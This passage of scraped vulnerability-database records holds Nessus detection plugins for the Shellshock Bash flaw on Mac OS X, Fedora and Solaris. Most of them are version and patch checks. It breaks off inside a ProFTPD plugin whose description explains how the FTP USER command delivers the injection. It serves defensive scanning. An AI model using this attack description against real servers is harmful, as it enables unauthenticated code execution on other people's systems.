7fef28b10aba60ef7d17cf6fd85b51e1c86e4447a7cb6de630b7e041e91f1fe9207e8c292e21026ba4515ea8d044434030761df8eddf82dd13569f358c8794f25ee9a7782c5abf28cd051a17bac422cffd1b64bd6608e9e64c13ceb608666893ecc43922c1dd0004654177d3f432f3ae2be6266d6524ba25c79d9376ca1b34924f8901c933db50b1d8f50cd0e6a8a69e6091ae66919697b2cb042d3852e2ded220fe204d2e7b250e7a2e9403a1854e76526a2d7649bc8222a8cd4e339f3c3b088d3eb7114c662725e5ce86a8efd9182cc67c28b909eefd045b66c30e648c68e2dabe2e28bd4d88fb6eb91b251a99f174ed3211d11d3ffcb25657019e3538e095c6a94321b665d4f543950ebdfb84aa9a23a49a2631c77bcf6c3e2c7aa09afb347b51e6d262e80c9d780fdfe6a9d73fdfcbe6a9c8e1b4fa92020f33efcbbf2523399032f17e2f0fb3433fd14040df9e16e254b09a040c1296e4a8838c9c8115a375ceb21034791d6cbca62a9215cd9cfd64bf8e57336dee3c3b59aa64ebf458661ee5ba8dfa3529daec14c3ed9c7460eb4636fa085789bd7df0eba98cf51cc6402f33c4d575450a4e6ad361c662abb83dea631a0e5adfa726ad5530c240a73f9ca4390a69150a9b51e15b415d05e5dd03e5f5e08da81a11ca8d4da5de90cf9a4e602e0caee0d9a520cdd1a7471a877d425eef462d935651d1fff99f40991b8768\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77971);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\");\n script_bugtraq_id(70103);\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"GNU Bash Local Environment Variable Handling Command Injection (Mac OS X) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is is affected by a remote code execution\nvulnerability, commonly referred to as Shellshock.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Mac OS X host has a version of Bash prior to\n3.2.53(1)-release installed. It is, therefore, affected by a command\ninjection vulnerability via environment variable manipulation.\nDepending on the configuration of the system, an attacker could\nremotely execute arbitrary code.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.apple.com/kb/HT6495\");\n # https://lists.apple.com/archives/security-announce/2014/Sep/msg00001.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b5039c7b\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.apple.com/kb/DL1767\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.apple.com/kb/DL1768\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.apple.com/kb/DL1769\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/post/shellshock/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the vendor-supplied patch.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7169\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Qmail SMTP Bash Environment Variable Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:gnu:bash\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"ssh_func.inc\");\ninclude(\"macosx_func.inc\");\n\n\nif(sshlib::get_support_level() >= sshlib::SSH_LIB_SUPPORTS_COMMANDS)\n enable_ssh_wrappers();\nelse disable_ssh_wrappers();\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nos = get_kb_item(\"Host/MacOSX/Version\");\nif (!os) audit(AUDIT_OS_NOT, \"Mac OS X\");\nif (!ereg(pattern:\"Mac OS X 10\\.[7-9]([^0-9]|$)\", string:os)) audit(AUDIT_OS_NOT, \"Mac OS X 10.9 / 10.8 / 10.7\");\n\nver_sh = NULL;\nver_bash = NULL;\n\npat = \"version ([0-9.]+\\([0-9]+\\))(\\-[a-z]+)?\";\n\ncmd = \"bash --version\";\nresult = exec_cmd(cmd:cmd);\nitem = eregmatch(pattern:pat, string:result);\nif (!isnull(item)) ver_bash_disp = item[1];\n\ncmd = \"sh --version\";\nresult = exec_cmd(cmd:cmd);\nitem = eregmatch(pattern:pat, string:result);\nif (!isnull(item)) ver_sh_disp = item[1];\n\nif (ver_sh_disp)\n{\n ver_sh = ereg_replace(string:ver_sh_disp, pattern:\"\\(\", replace:\".\");\n ver_sh1 = ereg_replace(string:ver_sh, pattern:\"\\)\", replace:\"\");\n}\nelse ver_sh1 = NULL;\nif (ver_bash_disp)\n{\n ver_bash = ereg_replace(string:ver_bash_disp, pattern:\"\\(\", replace:\".\");\n ver_bash1 = ereg_replace(string:ver_bash, pattern:\"\\)\", replace:\"\");\n}\nelse ver_bash1 = NULL;\n\nfix_disp = '3.2.53(1)';\nfix = '3.2.53.1';\n\nif (\n (!isnull(ver_sh1) && ver_compare(ver:ver_sh1, fix:fix, strict:FALSE) == -1) ||\n (!isnull(ver_bash1) && ver_compare(ver:ver_bash1, fix:fix, strict:FALSE) == -1)\n)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Installed version : ' + ver_bash_disp +\n '\\n Fixed version : ' + fix_disp +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(port:0);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, 'Bash', ver_bash_disp);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-04T23:56:51", "description": "This build should fix CVE-2014-7169\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2014-09-29T00:00:00", "type": "nessus", "title": "Fedora 19 : bash-4.2.48-2.fc19 (2014-11514) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2022-01-31T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:bash", "cpe:/o:fedoraproject:fedora:19"], "id": "FEDORA_2014-11514.NASL", "href": "https://www.tenable.com/plugins/nessus/77939", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-11514.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77939);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\");\n script_bugtraq_id(70103, 70137);\n script_xref(name:\"FEDORA\", value:\"2014-11514\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Fedora 19 : bash-4.2.48-2.fc19 (2014-11514) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Fedora host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"This build should fix CVE-2014-7169\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1146319\");\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-September/138679.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?80775253\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:19\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Fedora Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^19([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 19.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC19\", reference:\"bash-4.2.48-2.fc19\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-04T23:58:34", "description": "SunOS 5.9_x86: bash patch.\nDate this patch was last updated by Sun : Sep/30/14", "cvss3": {"score": null, "vector": null}, "published": "2014-10-09T00:00:00", "type": "nessus", "title": "Solaris 9 (x86) : 149080-02", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2022-01-31T00:00:00", "cpe": ["cpe:/o:sun:solaris"], "id": "SOLARIS9_X86_149080.NASL", "href": "https://www.tenable.com/plugins/nessus/78113", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78113);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\");\n script_bugtraq_id(70103, 70137);\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Solaris 9 (x86) : 149080-02\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing Sun Security Patch number 149080-02\");\n script_set_attribute(attribute:\"description\", value:\n\"SunOS 5.9_x86: bash patch.\nDate this patch was last updated by Sun : Sep/30/14\");\n script_set_attribute(attribute:\"see_also\", value:\"https://getupdates.oracle.com/readme/149080-02\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n # https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dacf7829\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/2014/09/cve-2014-6271/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://blogs.oracle.com/patch/entry/solaris_idrs_available_on_mos\");\n script_set_attribute(attribute:\"see_also\", value:\"https://getupdates.oracle.com/readme/149080-02\");\n script_set_attribute(attribute:\"solution\", value:\n\"You should install this patch for your system to be up-to-date.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:sun:solaris\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Solaris Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"solaris.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Solaris/showrev\")) audit(AUDIT_OS_NOT, \"Solaris 10 or earlier\");\n\nif (solaris_check_patch(release:\"5.9_x86\", arch:\"i386\", patch:\"149080-02\", obsoleted_by:\"\", package:\"SUNWbashS\", version:\"11.9.0,REV=2002.03.02.00.30\") < 0) flag++;\nif (solaris_check_patch(release:\"5.9_x86\", arch:\"i386\", patch:\"149080-02\", obsoleted_by:\"\", package:\"SUNWbash\", version:\"11.9.0,REV=2002.03.02.00.30\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:solaris_get_report());\n else security_hole(0);\n exit(0);\n}\naudit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-04T23:56:13", "description": "SunOS 5.9: bash patch. \n\nDate this patch was last updated by Oracle : Sep/26/14", "cvss3": {"score": null, "vector": null}, "published": "2014-09-26T00:00:00", "type": "nessus", "title": "Solaris 9 (sparc) : 149079-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2021-01-14T00:00:00", "cpe": ["cpe:/o:sun:solaris"], "id": "SOLARIS9_149079-01.NASL", "href": "https://www.tenable.com/plugins/nessus/77911", "sourceData": "#%NASL_MIN_LEVEL 70300\n# @DEPRECATED@\n#\n# This script has been deprecated by solaris9_149079.nasl.\n#\n# Disabled on 2014/10/13.\n#\n\n#\n# (C) Tenable Network Security, Inc.\n#\n\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77911);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\");\n script_bugtraq_id(70103, 70137);\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n\n script_name(english:\"Solaris 9 (sparc) : 149079-01\");\n script_summary(english:\"Check for patch 149079-01\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"The remote host is missing Oracle Security Patch number 149079-01\");\n script_set_attribute(attribute:\"description\", value:\n\"SunOS 5.9: bash patch. \n\nDate this patch was last updated by Oracle : Sep/26/14\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n # https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dacf7829\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/2014/09/cve-2014-6271/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://blogs.oracle.com/patch/entry/solaris_idrs_available_on_mos\");\n script_set_attribute(attribute:\"see_also\", value:\"https://getupdates.oracle.com/readme/149079-01\");\n script_set_attribute(attribute:\"solution\", value:\"You should install this patch for your system to be up-to-date.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Pure-FTPd External Authentication Bash Environment Variable Code Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:sun:solaris\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\", \"Host/Solaris/pkginfo\");\n\n exit(0);\n}\n\n# Deprecated.\nexit(0, \"This plugin has been deprecated. Refer to plugin #78112 (solaris9_149079.nasl) instead.\");\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"solaris.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Solaris/showrev\")) audit(AUDIT_OS_NOT, \"Solaris 10 or earlier\");\nif (!get_kb_item(\"Host/Solaris/pkginfo\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (solaris_check_patch(release:\"5.9\", arch:\"sparc\", patch:\"149079-01\", obsoleted_by:\"\", package:\"SUNWbash\", version:\"11.9.0,REV=2002.03.02.00.35\") < 0) flag++;\nif (solaris_check_patch(release:\"5.9\", arch:\"sparc\", patch:\"149079-01\", obsoleted_by:\"\", package:\"SUNWbashS\", version:\"11.9.0,REV=2002.03.02.00.35\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:solaris_get_report());\n else security_hole(0);\n exit(0);\n}\naudit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-04T23:55:56", "description": "The remote FTP server is affected by a remote code execution vulnerability due to an error in the Bash shell running on the remote host. A remote, unauthenticated attacker can execute arbitrary code on the remote host by sending a specially crafted request via the USER FTP command. The 'mod_exec' module exports the attacker-supplied username as an environment variable, which is then evaluated by Bash as code.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2014-09-30T00:00:00", "type": "nessus", "title": "GNU Bash Environment Variable Handling Code Injection via ProFTPD (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2022-01-31T00:00:00", "cpe": ["cpe:/a:gnu:bash", "cpe:/a:proftpd:proftpd"], "id": "PROFTPD_BASH_INJECTION.NASL", "href": "https://www.tenable.com/plugins/nessus/77986", "sourceData": "#TRUSTED 0d22c28a04aea3eb59ba3413fcb856470f0351a3cc2cd2d58bf1e74df0f589ea80c37c19bd0b2daba3ec232f4fdfd13dfe2c097cc78c31e7e17431856113c385b600103353369b41100d0f8dddd9270baec66c1d29d86213dd825809d8e6cd284dfee14517ccad6a9a20a1eb8797c95f92188a216c14b39082bc7de69db47b247ad1bfc237ceafbf7f40d77f57d490491413c19ef0405b41cd1b7d575e93a311ce1cf38d15a83c9342b51c967fce0d5031b1657aacf93b7028a6cf82608498ea9a4950a6b4ca88e9417ec63f675877e036b30a5d63039e081fb4d8d7a685d2d4673348dcfbf03647715fd940ee8ce5410b9ee39806551f63b19e678bce9ae0fcc9303a796d46a5b0dc0bd1e2edf19e7d942c17fdd4899d879a77be5ccfe72a85013de83675646d8ec8c470a8b8b8f0ae1f3d25250ae7cdb9d9a03185ba5c763c5985dde7faf82ad099f89f16e0a2d8f87ba5d8096161d15a80a60acf2ecc9e692acc248a8870df53d07dc7c70ba57311998a280d0691c28bc5a0641b6974437a1253b3b034bc76f929425f2beb48f900ab158e2e91b021569c1cdf32f374b75b979be8df65441a504ad7dc98dfde1d52d7ba3b9438948cbaa9317cce8decdabcd8609676b329452fa480a43db9989d6e13f61a478627c6e0c673011e5a70f671e090ee23f8ca1ed0871613c64554311f0e476158ad264c74784a6e95eeefd641\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77986);\n script_version(\"1.25\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\");\n script_bugtraq_id(70103, 70137);\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"GNU Bash Environment Variable Handling Code Injection via ProFTPD (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote FTP server is affected by a remote code execution\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote FTP server is affected by a remote code execution\nvulnerability due to an error in the Bash shell running on the remote\nhost. A remote, unauthenticated attacker can execute arbitrary code on\nthe remote host by sending a specially crafted request via the USER\nFTP command. The 'mod_exec' module exports the attacker-supplied\nusername as an environment variable, which is then evaluated by Bash\nas code.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.proftpd.org/docs/contrib/mod_exec.html#ExecEnviron\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n # https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dacf7829\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/post/shellshock/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the referenced patch.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7169\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Qmail SMTP Bash Environment Variable Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:gnu:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:proftpd:proftpd\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"FTP\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ftpserver_detect_type_nd_version.nasl\", \"ftp_starttls.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/ftp\", 21);\n script_timeout(600);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"byte_func.inc\");\ninclude(\"ftp_func.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"kerberos_func.inc\");\ninclude(\"ldap_func.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"nntp_func.inc\");\ninclude(\"rsync.inc\");\ninclude(\"smtp_func.inc\");\ninclude(\"ssl_funcs.inc\");\ninclude(\"telnet2_func.inc\");\n\nport = get_ftp_port(default:21);\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nfunction ftp_open(port)\n{\n local_var encaps, soc;\n\n encaps = get_port_transport(port);\n if (encaps > ENCAPS_IP)\n {\n if (get_kb_item(\"global_settings/disable_test_ssl_based_services\"))\n exit(1, \"Not testing SSL based services per user config.\");\n soc = open_sock_ssl(port, encaps:encaps);\n }\n else soc = open_sock_tcp(port, transport:ENCAPS_IP);\n if (!soc) audit(AUDIT_SOCK_FAIL, port);\n\n 